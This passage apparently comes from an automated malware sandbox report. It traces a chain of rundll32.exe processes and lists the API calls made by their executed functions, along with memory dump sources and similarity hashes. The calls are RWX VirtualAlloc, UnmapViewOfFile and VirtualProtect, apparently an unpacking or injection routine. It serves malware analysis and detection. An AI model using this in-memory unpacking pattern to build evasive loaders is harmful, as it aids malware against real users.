                        Function 0019E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2096150836.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2096150836.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 1776 Parent PID: 2500 rundll32.exeCOMMON

                        Executed Functions

                        Function 0019E530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019E575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 0019E625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019E63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019E770
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2097986294.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 880c5c81e2e1976ec981187a5533cbaba6ebb3d1247c84d52413e401bf50f109
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 6DB198B4E00109DFCB48CF84C591EAEB7B5BF88304F248159E919AB355D735EE82CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0019DF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019DFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000C.00000002.2097986294.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: df304f0021e6e0d437b90b3cd95d023e61d48827e8e10396f09c9c1849e37b87
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 5A110060D08289EEEF01D7E8D40A7EEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 2808 Parent PID: 1776 rundll32.exeCOMMON

                        Executed Functions

                        Function 001EE530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EE575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 001EE625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001EE63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001EE770
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2100119282.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: 9b3abedbca77c78346b3b53129e99b4b163c2363180435cc8638868f85b652ee
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: 85B198B5E00109DFCB48CF85C591EAEB7B5BF88304F248159E919AB355D735EE82CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 001EDF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001EDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000D.00000002.2100119282.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 738635efc9121062dd9be3251f5c3d9d0afedcae698c334c78910768e5afd0e6
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 86113060D082CDDEEB01D7E894097EEBFB55F21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 3068 Parent PID: 2808 rundll32.exeCOMMON

                        Executed Functions

                        Function 001FE530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FE575
                        • UnmapViewOfFile.KERNELBASE(?), ref: 001FE625
                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001FE63F
                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001FE770
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2101128354.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: c799c7000676d9b31d1e41de175b68fe9ad3e4d1961a4037ba5c9b97be4bc0fa
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: B9B199B4E00109DFCB48CF85C591AAEB7B6BF88314F248159E915AB355D735EE82CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 001FDF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001FDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2101128354.00000000001E0000.00000040.00000001.sdmp, Offset: 001E0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: 9579a99de9f248dce1337c0b51852080bef0ea809efadb1c8204388a578e4165
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 991130A0D0828DDEEB01D7E89409BFEBFB55B21704F044098D6456B282D7BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Analysis Process: rundll32.exe PID: 3012 Parent PID: 3068 rundll32.exeCOMMON

                        Executed Functions

                        Function 000EE530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000EE575
                        • UnmapViewOfFile.KERNEL32(?), ref: 000EE625
                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 000EE63F
                        • VirtualProtect.KERNEL32(?,?,00000000), ref: 000EE770
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2337245294.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                        Similarity
                        • API ID: Virtual$Alloc$FileProtectUnmapView
                        • String ID:
                        • API String ID: 238919573-0
                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction ID: b9cfccb2cacb7ddc3ea003575be257f3765b200102621a9bc919e20b70511b1d
                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                        • Instruction Fuzzy Hash: E6B198B5E00149DFCB48CF85C591EAEB7B5BF88304F208159E919AB355D735EE82CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 000EDF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 000EDFD4
                        Strings
                        Memory Dump Source
                        • Source File: 0000000F.00000002.2337245294.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: VirtualAlloc
                        • API String ID: 4275171209-164498762
                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction ID: e57af119b9438eb41fd0c81363060c3edbc9cb43bbbf35dc2686fcfa10d8bdc4
                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                        • Instruction Fuzzy Hash: 84113060D082CDEEEB01D7E8C4097EEBFB55F11704F044098D6457B282D2BA57588BA6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions